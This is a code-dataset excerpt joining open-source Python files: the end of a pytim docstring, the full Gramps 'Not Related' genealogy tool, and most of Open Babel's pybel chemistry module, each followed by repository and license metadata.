[ 12 14904]
>>> print (np.sort(c2)[-2:])
[ 0 9335]
>>> print ((np.all(c1==c2), np.all(l1==l2)))
(True, True)
"""
pass
|
balazsfabian/pytim
|
pytim/utilities_dbscan.py
|
Python
|
gpl-3.0
| 3,974
|
[
"MDAnalysis"
] |
649e60e09c7ff6b788d6686a22b86685140323cbd1b34401a31a813f22da4805
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2007-2009 Stephane Charette
# Copyright (C) 2008 Brian Matherly
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2010 Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"Find people who are not related to the selected person"
#------------------------------------------------------------------------
#
# GNOME/GTK modules
#
#------------------------------------------------------------------------
from gi.repository import Gtk
from gi.repository import GObject
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
ngettext = glocale.translation.ngettext # else "nearby" comments are ignored
from gramps.gen.const import URL_MANUAL_PAGE
from gramps.gen.errors import WindowActiveError
from gramps.gui.plug import tool
from gramps.gen.plug.report import utils
from gramps.gui.editors import EditPerson, EditFamily
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.utils import ProgressMeter
from gramps.gui.display import display_help
from gramps.gui.glade import Glade
from gramps.gen.lib import Tag
from gramps.gen.db import DbTxn
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
WIKI_HELP_PAGE = '%s_-_Tools' % URL_MANUAL_PAGE
WIKI_HELP_SEC = _('manual|Not_Related')
#------------------------------------------------------------------------
#
# NotRelated class
#
#------------------------------------------------------------------------
class NotRelated(tool.ActivePersonTool, ManagedWindow):
def __init__(self, dbstate, user, options_class, name, callback=None):
uistate = user.uistate
tool.ActivePersonTool.__init__(self, dbstate, uistate, options_class,
name)
if self.fail: # bug #2709 -- fail if we have no active person
return
person_handle = uistate.get_active('Person')
person = dbstate.db.get_person_from_handle(person_handle)
self.name = person.get_primary_name().get_regular_name()
self.title = _('Not related to "%s"') % self.name
ManagedWindow.__init__(self, uistate, [], self.__class__)
self.dbstate = dbstate
self.uistate = uistate
self.db = dbstate.db
topDialog = Glade()
topDialog.connect_signals({
"destroy_passed_object" : self.close,
"on_help_clicked" : self.on_help_clicked,
"on_delete_event" : self.close,
})
window = topDialog.toplevel
title = topDialog.get_object("title")
self.set_window(window, title, self.title)
self.setup_configs('interface.notrelated', 450, 400)
self.tagcombo = topDialog.get_object("tagcombo")
tagmodel = Gtk.ListStore(str)
self.tagcombo.set_model(tagmodel)
self.tagcombo.set_entry_text_column(0)
tagmodel.append((_('ToDo'),))
tagmodel.append((_('NotRelated'),))
self.tagcombo.set_sensitive(False)
self.tagapply = topDialog.get_object("tagapply")
self.tagapply.set_sensitive(False)
self.tagapply.connect('clicked', self.applyTagClicked)
# start the progress indicator
self.progress = ProgressMeter(self.title, _('Starting'),
parent=self.uistate.window)
# setup the columns
self.model = Gtk.TreeStore(
GObject.TYPE_STRING, # 0==name
GObject.TYPE_STRING, # 1==person gid
GObject.TYPE_STRING, # 2==parents
GObject.TYPE_STRING, # 3==tags
GObject.TYPE_STRING) # 4==family gid (not shown to user)
# note -- don't assign the model to the tree until it has been populated,
# otherwise the screen updates are terribly slow while names are appended
self.treeView = topDialog.get_object("treeview")
col1 = Gtk.TreeViewColumn(_('Name'), Gtk.CellRendererText(), text=0)
col2 = Gtk.TreeViewColumn(_('ID'), Gtk.CellRendererText(), text=1)
col3 = Gtk.TreeViewColumn(_('Parents'), Gtk.CellRendererText(), text=2)
col4 = Gtk.TreeViewColumn(_('Tags'), Gtk.CellRendererText(), text=3)
col1.set_resizable(True)
col2.set_resizable(True)
col3.set_resizable(True)
col4.set_resizable(True)
col1.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col2.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col3.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col4.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col1.set_sort_column_id(0)
# col2.set_sort_column_id(1)
# col3.set_sort_column_id(2)
col4.set_sort_column_id(3)
self.treeView.append_column(col1)
self.treeView.append_column(col2)
self.treeView.append_column(col3)
self.treeView.append_column(col4)
self.treeSelection = self.treeView.get_selection()
self.treeSelection.set_mode(Gtk.SelectionMode.MULTIPLE)
self.treeSelection.set_select_function(self.selectIsAllowed, None)
self.treeSelection.connect('changed', self.rowSelectionChanged)
self.treeView.connect('row-activated', self.rowActivated)
# initialize a few variables we're going to need
self.numberOfPeopleInDatabase = self.db.get_number_of_people()
self.numberOfRelatedPeople = 0
self.numberOfUnrelatedPeople = 0
# create the sets used to track related and unrelated people
self.handlesOfPeopleToBeProcessed = set()
self.handlesOfPeopleAlreadyProcessed = set()
self.handlesOfPeopleNotRelated = set()
# build a set of all people related to the selected person
self.handlesOfPeopleToBeProcessed.add(person.get_handle())
self.findRelatedPeople()
# now that we have our list of related people, find everyone
# in the database who isn't on our list
self.findUnrelatedPeople()
# populate the treeview model with the names of unrelated people
if self.numberOfUnrelatedPeople == 0:
# feature request 2356: avoid genitive form
title.set_text(_('Everyone in the database is related to %s') % self.name)
else:
self.populateModel()
self.model.set_sort_column_id(0, Gtk.SortType.ASCENDING)
self.treeView.set_model(self.model)
# self.treeView.set_row_separator_func(self.iterIsSeparator, None)
self.treeView.expand_all()
# done searching through the database, so close the progress bar
self.progress.close()
self.show()
def iterIsSeparator(self, model, iter):
# return True only if the row is to be treated as a separator
if self.model.get_value(iter, 1) == '': # does the row have a GID?
return True
return False
def selectIsAllowed(self, selection, model, path, isSelected, userData):
# return True/False depending on if the row being selected is a leaf node
iter = self.model.get_iter(path)
if self.model.get_value(iter, 1) == '': # does the row have a GID?
return False
return True
def rowSelectionChanged(self, selection):
state = selection.count_selected_rows() > 0
self.tagcombo.set_sensitive(state)
self.tagapply.set_sensitive(state)
def rowActivated(self, treeView, path, column):
# first we need to check that the row corresponds to a person
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
familyGid = self.model.get_value(iter, 4)
if familyGid != '': # do we have a family?
# get the parent family for this person
family = self.db.get_family_from_gramps_id(familyGid)
if family:
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
elif personGid != '': # do we have a person?
# get the person that corresponds to this GID
person = self.db.get_person_from_gramps_id(personGid)
if person:
try:
EditPerson(self.dbstate, self.uistate, [], person)
except WindowActiveError:
pass
def on_help_clicked(self, obj):
"""Display the relevant portion of Gramps manual"""
display_help(WIKI_HELP_PAGE , WIKI_HELP_SEC)
def applyTagClicked(self, button) :
progress = None
rows = self.treeSelection.count_selected_rows()
tag_name = str(self.tagcombo.get_active_text())
# start the db transaction
with DbTxn("Tag not related", self.db) as transaction:
tag = self.db.get_tag_from_name(tag_name)
if not tag:
# create the tag if it doesn't already exist
tag = Tag()
tag.set_name(tag_name)
tag.set_priority(self.db.get_number_of_tags())
tag_handle = self.db.add_tag(tag, transaction)
else:
tag_handle = tag.get_handle()
# if more than 1 person is selected, use a progress indicator
if rows > 1:
progress = ProgressMeter(self.title, _('Starting'),
parent=self.window)
progress.set_pass(
# translators: leave all/any {...} untranslated
#TRANS: no singular form needed, as rows is always > 1
ngettext("Setting tag for {number_of} person",
"Setting tag for {number_of} people",
rows).format(number_of=rows),
rows)
# iterate through all of the selected rows
(model, paths) = self.treeSelection.get_selected_rows()
for path in paths:
if progress:
progress.step()
# for the current row, get the GID and the person from the database
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
person = self.db.get_person_from_gramps_id(personGid)
# add the tag to the person
person.add_tag(tag_handle)
# save this change
self.db.commit_person(person, transaction)
# refresh the tags column
self.treeView.set_model(None)
for path in paths:
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
person = self.db.get_person_from_gramps_id(personGid)
self.model.set_value(iter, 3, self.get_tag_list(person))
self.treeView.set_model(self.model)
self.treeView.expand_all()
if progress:
progress.close()
def findRelatedPeople(self):
self.progress.set_pass(
# translators: leave all/any {...} untranslated
#TRANS: No singular form is needed.
ngettext("Finding relationships between {number_of} person",
"Finding relationships between {number_of} people",
self.numberOfPeopleInDatabase
).format(number_of=self.numberOfPeopleInDatabase),
self.numberOfPeopleInDatabase)
# as long as we have people we haven't processed yet, keep looping
while len(self.handlesOfPeopleToBeProcessed) > 0:
handle = self.handlesOfPeopleToBeProcessed.pop()
### DEBUG DEBUG DEBUG
# if len(self.handlesOfPeopleAlreadyProcessed) > 50:
# break
###
# see if we've already processed this person
if handle in self.handlesOfPeopleAlreadyProcessed:
continue
person = self.db.get_person_from_handle(handle)
# if we get here, then we're dealing with someone new
self.progress.step()
# remember that we've now seen this person
self.handlesOfPeopleAlreadyProcessed.add(handle)
# we have 4 things to do: find (1) spouses, (2) parents, siblings(3), and (4) children
# step 1 -- spouses
for familyHandle in person.get_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
spouseHandle = utils.find_spouse(person, family)
if spouseHandle and \
spouseHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(spouseHandle)
# step 2 -- parents
for familyHandle in person.get_parent_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
fatherHandle = family.get_father_handle()
motherHandle = family.get_mother_handle()
if fatherHandle and \
fatherHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(fatherHandle)
if motherHandle and \
motherHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(motherHandle)
# step 3 -- siblings
for familyHandle in person.get_parent_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
for childRef in family.get_child_ref_list():
childHandle = childRef.ref
if childHandle and \
childHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(childHandle)
# step 4 -- children
for familyHandle in person.get_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
for childRef in family.get_child_ref_list():
childHandle = childRef.ref
if childHandle and \
childHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(childHandle)
def findUnrelatedPeople(self):
# update our numbers
self.numberOfRelatedPeople = len(self.handlesOfPeopleAlreadyProcessed)
self.numberOfUnrelatedPeople = (self.numberOfPeopleInDatabase -
self.numberOfRelatedPeople)
if self.numberOfUnrelatedPeople > 0:
# we have at least 1 "unrelated" person to find
self.progress.set_pass(
# translators: leave all/any {...} untranslated
ngettext("Looking for {number_of} person",
"Looking for {number_of} people",
self.numberOfUnrelatedPeople
).format(number_of=self.numberOfUnrelatedPeople),
self.numberOfPeopleInDatabase)
# loop through everyone in the database
for handle in self.db.iter_person_handles():
self.progress.step()
# if this person is related, then skip to the next one
if handle in self.handlesOfPeopleAlreadyProcessed:
continue
### DEBUG DEBUG DEBUG
# if len(self.handlesOfPeopleNotRelated) > 10:
# break
###
# if we get here, we have someone who is "not related"
self.handlesOfPeopleNotRelated.add(handle)
def populateModel(self):
self.progress.set_pass(
# translators: leave all/any {...} untranslated
ngettext("Looking up the name of {number_of} person",
"Looking up the names of {number_of} people",
self.numberOfUnrelatedPeople
).format(number_of=self.numberOfUnrelatedPeople),
self.numberOfUnrelatedPeople)
# loop through the entire list of unrelated people
for handle in self.handlesOfPeopleNotRelated:
self.progress.step()
person = self.db.get_person_from_handle(handle)
primaryname = person.get_primary_name()
surname = primaryname.get_surname()
name = primaryname.get_name()
gid = person.get_gramps_id()
# Retrieve the sorted tag list
tag_list = self.get_tag_list(person)
# find the names of the parents
familygid = ''
parentNames = ''
parentFamilyHandle = person.get_main_parents_family_handle()
if parentFamilyHandle:
parentFamily = self.db.get_family_from_handle(parentFamilyHandle)
familygid = parentFamily.get_gramps_id()
fatherName = None
motherName = None
fatherHandle = parentFamily.get_father_handle()
if fatherHandle:
father = self.db.get_person_from_handle(fatherHandle)
fatherName = father.get_primary_name().get_first_name()
motherHandle = parentFamily.get_mother_handle()
if motherHandle:
mother = self.db.get_person_from_handle(motherHandle)
motherName = mother.get_primary_name().get_first_name()
# now that we have the names, come up with a label we can use
if fatherName:
parentNames += fatherName
if fatherName and motherName:
parentNames += ' & '
if motherName:
parentNames += motherName
# get the surname node (or create it if it doesn't exist)
# start with the root
iter = self.model.get_iter_first()
# look for a node with a matching surname
while iter:
if self.model.get_value(iter, 0) == surname:
break;
iter = self.model.iter_next(iter)
# if we don't have a valid iter, then create a new top-level node
if not iter:
iter = self.model.append(None, [surname, '', '', '', ''])
# finally, we now get to add this person to the model
self.model.append(iter, [name, gid, parentNames, tag_list,
familygid])
def build_menu_names(self, obj):
return (self.title, None)
def get_tag_list(self, person):
"""
Return a sorted list of tag names for the given person.
"""
tags = []
for handle in person.get_tag_list():
tag = self.db.get_tag_from_handle(handle)
tags.append(tag.get_name())
tags.sort(key=glocale.sort_key)
# TODO for Arabic, should the next line's comma be translated?
return ', '.join(tags)
#------------------------------------------------------------------------
#
# NotRelatedOptions
#
#------------------------------------------------------------------------
class NotRelatedOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
""" Initialize the options class """
tool.ToolOptions.__init__(self, name, person_id)
|
sam-m888/gramps
|
gramps/plugins/tool/notrelated.py
|
Python
|
gpl-2.0
| 20,402
|
[
"Brian"
] |
27161d7c6d27a8fe21c5bb6c94808457b6d6abafb6a860a0e48a92d10aea9229
|
# -*. coding: utf-8 -*-
# Copyright (c) 2008-2012, Noel O'Boyle; 2012, Adrià Cereto-Massagué
# All rights reserved.
#
# This file is part of Cinfony.
# The contents are covered by the terms of the GPL v2 license
# which is included in the file LICENSE_GPLv2.txt.
"""
pybel - A Cinfony module for accessing Open Babel
Global variables:
ob - the underlying SWIG bindings for Open Babel
informats - a dictionary of supported input formats
outformats - a dictionary of supported output formats
descs - a list of supported descriptors
fps - a list of supported fingerprint types
forcefields - a list of supported forcefields
"""
import sys
import os.path
import tempfile
import json
import uuid
import xml.etree.ElementTree as ET
if sys.platform[:4] == "java":
import org.openbabel as ob
import java.lang.System
java.lang.System.loadLibrary("openbabel_java")
_obfuncs = ob.openbabel_java
_obconsts = ob.openbabel_javaConstants
import javax
elif sys.platform[:3] == "cli":
import System
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Windows.Forms import Application, DockStyle, Form, PictureBox
from System.Windows.Forms import PictureBoxSizeMode
from System.Drawing import Image, Size
_obdotnet = os.environ["OBDOTNET"]
if _obdotnet[0] == '"': # Remove trailing quotes
_obdotnet = _obdotnet[1:-1]
clr.AddReferenceToFileAndPath(os.path.join(_obdotnet, "OBDotNet.dll"))
import OpenBabel as ob
_obfuncs = ob.openbabel_csharp
_obconsts = ob.openbabel_csharp
else:
import openbabel as ob
_obfuncs = _obconsts = ob
try:
import Tkinter as tk
import Image as PIL
import ImageTk as piltk
except ImportError: # pragma: no cover
tk = None
def _formatstodict(list):
if sys.platform[:4] == "java":
list = [list.get(i) for i in range(list.size())]
broken = [x.replace("[Read-only]", "").replace("[Write-only]", "").split(
" -- ") for x in list]
broken = [(x, y.strip()) for x, y in broken]
return dict(broken)
def _getplugins(findplugin, names):
return dict([(x, findplugin(x)) for x in names if findplugin(x)])
def _getpluginnames(ptype):
if sys.platform[:4] == "cli":
plugins = ob.VectorString()
else:
plugins = ob.vectorString()
ob.OBPlugin.ListAsVector(ptype, None, plugins)
if sys.platform[:4] == "java":
plugins = [plugins.get(i) for i in range(plugins.size())]
return [x.split()[0] for x in plugins if x.strip()]
_obconv = ob.OBConversion()
_builder = ob.OBBuilder()
informats = _formatstodict(_obconv.GetSupportedInputFormat())
"""A dictionary of supported input formats"""
outformats = _formatstodict(_obconv.GetSupportedOutputFormat())
"""A dictionary of supported output formats"""
descs = _getpluginnames("descriptors")
"""A list of supported descriptors"""
_descdict = _getplugins(ob.OBDescriptor.FindType, descs)
fps = [_x.lower() for _x in _getpluginnames("fingerprints")]
"""A list of supported fingerprint types"""
_fingerprinters = _getplugins(ob.OBFingerprint.FindFingerprint, fps)
forcefields = [_x.lower() for _x in _getpluginnames("forcefields")]
"""A list of supported forcefields"""
_forcefields = _getplugins(ob.OBForceField.FindType, forcefields)
charges = [_x.lower() for _x in _getpluginnames("charges")]
"""A list of supported charge models"""
_charges = _getplugins(ob.OBChargeModel.FindType, charges)
operations = _getpluginnames("ops")
"""A list of supported operations"""
_operations = _getplugins(ob.OBOp.FindType, operations)
ipython_3d = False
"""Toggles 2D vs 3D molecule representations in IPython notebook"""
def readfile(format, filename, opt=None):
"""Iterate over the molecules in a file.
Required parameters:
format - see the informats variable for a list of available
input formats
filename
Optional parameters:
opt - a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
You can access the first molecule in a file using the next() method
of the iterator (or the next() keyword in Python 3):
mol = readfile("smi", "myfile.smi").next() # Python 2
mol = next(readfile("smi", "myfile.smi")) # Python 3
You can make a list of the molecules in a file using:
mols = list(readfile("smi", "myfile.smi"))
You can iterate over the molecules in a file as shown in the
following code snippet:
>>> atomtotal = 0
>>> for mol in readfile("sdf", "head.sdf"):
... atomtotal += len(mol.atoms)
...
>>> print atomtotal
43
"""
if opt is None:
opt = {}
obconversion = ob.OBConversion()
formatok = obconversion.SetInFormat(format)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.INOPTIONS)
else:
obconversion.AddOption(k, obconversion.INOPTIONS, str(v))
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" % format)
if not os.path.isfile(filename):
raise IOError("No such file: '%s'" % filename)
def filereader():
obmol = ob.OBMol()
notatend = obconversion.ReadFile(obmol, filename)
while notatend:
yield Molecule(obmol)
obmol = ob.OBMol()
notatend = obconversion.Read(obmol)
return filereader()
def readstring(format, string, opt=None):
"""Read in a molecule from a string.
Required parameters:
format - see the informats variable for a list of available
input formats
string
Optional parameters:
opt - a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
Example:
>>> input = "C1=CC=CS1"
>>> mymol = readstring("smi", input)
>>> len(mymol.atoms)
5
"""
if opt is None:
opt = {}
obmol = ob.OBMol()
obconversion = ob.OBConversion()
formatok = obconversion.SetInFormat(format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" % format)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.INOPTIONS)
else:
obconversion.AddOption(k, obconversion.INOPTIONS, str(v))
success = obconversion.ReadString(obmol, string)
if not success:
raise IOError("Failed to convert '%s' to format '%s'" % (
string, format))
return Molecule(obmol)
class Outputfile(object):
"""Represent a file to which *output* is to be sent.
Although it's possible to write a single molecule to a file by
calling the write() method of a molecule, if multiple molecules
are to be written to the same file you should use the Outputfile
class.
Required parameters:
format - see the outformats variable for a list of available
output formats
filename
Optional parameters:
overwrite -- if the output file already exists, should it
be overwritten? (default is False)
opt -- a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
Methods:
write(molecule)
close()
"""
def __init__(self, format, filename, overwrite=False, opt=None):
if opt is None:
opt = {}
self.format = format
self.filename = filename
if not overwrite and os.path.isfile(self.filename):
raise IOError(
"%s already exists. Use 'overwrite=True' to overwrite it." %
self.filename)
self.obConversion = ob.OBConversion()
formatok = self.obConversion.SetOutFormat(self.format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" %
format)
if filename and filename.split('.')[-1] == 'gz':
self.obConversion.AddOption('z', self.obConversion.GENOPTIONS)
for k, v in opt.items():
if v is None:
self.obConversion.AddOption(k, self.obConversion.OUTOPTIONS)
else:
self.obConversion.AddOption(k, self.obConversion.OUTOPTIONS, str(v))
self.total = 0 # The total number of molecules written to the file
def write(self, molecule):
"""Write a molecule to the output file.
Required parameters:
molecule
"""
if not self.filename:
raise IOError("Outputfile instance is closed.")
if self.total == 0:
self.obConversion.WriteFile(molecule.OBMol, self.filename)
else:
self.obConversion.Write(molecule.OBMol)
self.total += 1
def close(self):
"""Close the Outputfile to further writing."""
self.obConversion.CloseOutFile()
self.filename = None
class Molecule(object):
"""Represent a Pybel Molecule.
Required parameter:
OBMol -- an Open Babel OBMol or any type of cinfony Molecule
Attributes:
atoms, charge, conformers, data, dim, energy, exactmass, formula,
molwt, spin, sssr, title, unitcell.
(refer to the Open Babel library documentation for more info).
Methods:
addh(), calcfp(), calcdesc(), draw(), localopt(), make3D(),
calccharges(), removeh(), write()
The underlying Open Babel molecule can be accessed using the attribute:
OBMol
"""
_cinfony = True
def __init__(self, OBMol):
if hasattr(OBMol, "_cinfony"):
a, b = OBMol._exchange
if a == 0:
mol = readstring("smi", b)
else:
mol = readstring("mol", b)
OBMol = mol.OBMol
self.OBMol = OBMol
@property
def atoms(self):
return [Atom(self.OBMol.GetAtom(i + 1))
for i in range(self.OBMol.NumAtoms())]
@property
def residues(self):
return [Residue(res) for res in ob.OBResidueIter(self.OBMol)]
@property
def charge(self):
return self.OBMol.GetTotalCharge()
@property
def conformers(self):
return self.OBMol.GetConformers()
@property
def data(self):
return MoleculeData(self.OBMol)
@property
def dim(self):
return self.OBMol.GetDimension()
@property
def energy(self):
return self.OBMol.GetEnergy()
@property
def exactmass(self):
return self.OBMol.GetExactMass()
@property
def formula(self):
return self.OBMol.GetFormula()
@property
def molwt(self):
return self.OBMol.GetMolWt()
@property
def spin(self):
return self.OBMol.GetTotalSpinMultiplicity()
@property
def sssr(self):
return self.OBMol.GetSSSR()
def _gettitle(self):
return self.OBMol.GetTitle()
def _settitle(self, val):
self.OBMol.SetTitle(val)
title = property(_gettitle, _settitle)
@property
def unitcell(self):
unitcell_index = _obconsts.UnitCell
if sys.platform[:3] == "cli":
unitcell_index = System.UInt32(unitcell_index)
unitcell = self.OBMol.GetData(unitcell_index)
if unitcell:
if sys.platform[:3] != "cli":
return _obfuncs.toUnitCell(unitcell)
else:
return unitcell.Downcast[ob.OBUnitCell]()
else:
raise AttributeError("Molecule has no attribute 'unitcell'")
@property
def clone(self):
return Molecule(ob.OBMol(self.OBMol))
@property
def _exchange(self):
if self.OBMol.HasNonZeroCoords():
return (1, self.write("mol"))
else:
return (0, self.write("can").split()[0])
def __iter__(self):
"""Iterate over the Atoms of the Molecule.
This allows constructions such as the following:
for atom in mymol:
print atom
"""
return iter(self.atoms)
def _repr_svg_(self):
"""For IPython notebook, renders 2D pybel.Molecule SVGs."""
# Returning None defers to _repr_javascript_
if ipython_3d:
return None
# Open babel returns a nested svg, which IPython unpacks and treats as
# two SVGs, messing with the display location. This parses out the
# inner svg before handing over to IPython.
namespace = "http://www.w3.org/2000/svg"
ET.register_namespace("", namespace)
obsvg = self.clone.write("svg")
tree = ET.fromstring(obsvg)
svg = tree.find("{{{ns}}}g/{{{ns}}}svg".format(ns=namespace))
return ET.tostring(svg).decode("utf-8")
def _repr_html_(self):
"""For IPython notebook, renders 3D pybel.Molecule webGL objects."""
# Returning None defers to _repr_svg_
if not ipython_3d:
return None
try:
import imolecule
except ImportError:
raise ImportError("Cannot import 3D rendering. Please install "
"with `pip install imolecule`.")
return imolecule.draw(self.clone, format="pybel", display_html=False)
def calcdesc(self, descnames=[]):
"""Calculate descriptor values.
Optional parameter:
descnames -- a list of names of descriptors
If descnames is not specified, all available descriptors are
calculated. See the descs variable for a list of available
descriptors.
"""
if not descnames:
descnames = descs
ans = {}
for descname in descnames:
try:
desc = _descdict[descname]
except KeyError:
raise ValueError(("%s is not a recognised Open Babel "
"descriptor type") % descname)
ans[descname] = desc.Predict(self.OBMol)
return ans
def calcfp(self, fptype="FP2"):
"""Calculate a molecular fingerprint.
Optional parameters:
fptype -- the fingerprint type (default is "FP2"). See the
fps variable for a list of of available fingerprint
types.
"""
if sys.platform[:3] == "cli":
fp = ob.VectorUInt()
else:
fp = ob.vectorUnsignedInt()
fptype = fptype.lower()
try:
fingerprinter = _fingerprinters[fptype]
except KeyError:
raise ValueError(
"%s is not a recognised Open Babel Fingerprint type" % fptype)
fingerprinter.GetFingerprint(self.OBMol, fp)
return Fingerprint(fp)
def calccharges(self, model="mmff94"):
"""Estimates atomic partial charges in the molecule.
Optional parameters:
model -- default is "mmff94". See the charges variable for a list
of available charge models (in shell, `obabel -L charges`)
This method populates the `partialcharge` attribute of each atom
in the molecule in place.
"""
model = model.lower()
try:
charge_model = _charges[model]
except KeyError:
raise ValueError(
"%s is not a recognised Open Babel Charge Model type" % model)
success = charge_model.ComputeCharges(self.OBMol)
if not success:
errors = ob.obErrorLog.GetMessagesOfLevel(ob.obError)
error = errors[-1] if errors else "Molecule failed to charge."
raise Exception(error)
return [atom.partialcharge for atom in self.atoms]
def write(self, format="smi", filename=None, overwrite=False, opt=None):
"""Write the molecule to a file or return a string.
Optional parameters:
format -- see the informats variable for a list of available
output formats (default is "smi")
filename -- default is None
overwite -- if the output file already exists, should it
be overwritten? (default is False)
opt -- a dictionary of format specific options
For format options with no parameters, specify the
value as None.
If a filename is specified, the result is written to a file.
Otherwise, a string is returned containing the result.
To write multiple molecules to the same file you should use
the Outputfile class.
"""
if opt is None:
opt = {}
obconversion = ob.OBConversion()
formatok = obconversion.SetOutFormat(format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" %
format)
if filename and filename.split('.')[-1] == 'gz':
obconversion.AddOption('z', self.obConversion.GENOPTIONS)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.OUTOPTIONS)
else:
obconversion.AddOption(k, obconversion.OUTOPTIONS, str(v))
if filename:
if not overwrite and os.path.isfile(filename):
raise IOError(("%s already exists. Use 'overwrite=True' to "
"overwrite it.") % filename)
obconversion.WriteFile(self.OBMol, filename)
obconversion.CloseOutFile()
else:
return obconversion.WriteString(self.OBMol)
def localopt(self, forcefield="mmff94", steps=500):
"""Locally optimize the coordinates.
Optional parameters:
forcefield -- default is "mmff94". See the forcefields variable
for a list of available forcefields.
steps -- default is 500
If the molecule does not have any coordinates, make3D() is
called before the optimization. Note that the molecule needs
to have explicit hydrogens. If not, call addh().
"""
forcefield = forcefield.lower()
if self.dim != 3:
self.make3D(forcefield)
ff = _forcefields[forcefield]
success = ff.Setup(self.OBMol)
if not success:
return
ff.SteepestDescent(steps)
ff.GetCoordinates(self.OBMol)
def make3D(self, forcefield="mmff94", steps=50):
"""Generate 3D coordinates.
Optional parameters:
forcefield -- default is "mmff94". See the forcefields variable
for a list of available forcefields.
steps -- default is 50
Once coordinates are generated, hydrogens are added and a quick
local optimization is carried out with 50 steps and the
MMFF94 forcefield. Call localopt() if you want
to improve the coordinates further.
"""
forcefield = forcefield.lower()
_builder.Build(self.OBMol)
self.addh()
self.localopt(forcefield, steps)
def addh(self):
"""Add hydrogens."""
self.OBMol.AddHydrogens()
def removeh(self):
"""Remove hydrogens."""
self.OBMol.DeleteHydrogens()
def convertdbonds(self):
"""Convert Dative Bonds."""
self.OBMol.ConvertDativeBonds()
def __str__(self):
return self.write()
def draw(self, show=True, filename=None, update=False, usecoords=False):
"""Create a 2D depiction of the molecule.
Optional parameters:
show -- display on screen (default is True)
filename -- write to file (default is None)
update -- update the coordinates of the atoms to those
determined by the structure diagram generator
(default is False)
usecoords -- don't calculate 2D coordinates, just use
the current coordinates (default is False)
Tkinter and Python Imaging Library are required for image display.
"""
obconversion = ob.OBConversion()
formatok = obconversion.SetOutFormat("_png2")
if not formatok:
raise ImportError("PNG depiction support not found. You should "
"compile Open Babel with support for Cairo. See "
"installation instructions for more "
"information.")
# Need to copy to avoid removing hydrogens from self
workingmol = Molecule(ob.OBMol(self.OBMol))
workingmol.removeh()
if not usecoords:
_operations['gen2D'].Do(workingmol.OBMol)
if update:
if workingmol.OBMol.NumAtoms() != self.OBMol.NumAtoms():
raise RuntimeError("It is not possible to update the original "
"molecule with the calculated coordinates, "
"as the original molecule contains "
"explicit hydrogens for which no "
"coordinates have been calculated.")
else:
for i in range(workingmol.OBMol.NumAtoms()):
self.OBMol.GetAtom(i + 1).SetVector(
workingmol.OBMol.GetAtom(i + 1).GetVector())
if filename:
filedes = None
else:
if sys.platform[:3] == "cli" and show:
raise RuntimeError("It is only possible to show the molecule "
"if you provide a filename. The reason for "
"this is that I kept having problems "
"when using temporary files.")
filedes, filename = tempfile.mkstemp()
workingmol.write("_png2", filename=filename, overwrite=True)
if show:
if sys.platform[:4] == "java":
image = javax.imageio.ImageIO.read(java.io.File(filename))
frame = javax.swing.JFrame(visible=1)
frame.getContentPane().add(
javax.swing.JLabel(javax.swing.ImageIcon(image)))
frame.setSize(300, 300)
frame.setDefaultCloseOperation(
javax.swing.WindowConstants.DISPOSE_ON_CLOSE)
frame.show()
elif sys.platform[:3] == "cli":
form = _MyForm()
form.setup(filename, self.title)
Application.Run(form)
else:
if not tk:
raise ImportError("Tkinter or Python Imaging Library not "
"found, but is required for image "
"display. See installation instructions "
"for more information.")
root = tk.Tk()
root.title((hasattr(self, "title") and self.title)
or self.__str__().rstrip())
frame = tk.Frame(root, colormap="new",
visual='truecolor').pack()
image = PIL.open(filename)
imagedata = piltk.PhotoImage(image)
tk.Label(frame, image=imagedata).pack()
tk.Button(root, text="Close", command=root.destroy).pack(
fill=tk.X)
root.mainloop()
if filedes:
os.close(filedes)
os.remove(filename)
class Atom(object):
"""Represent a Pybel atom.
Required parameter:
OBAtom -- an Open Babel OBAtom
Attributes:
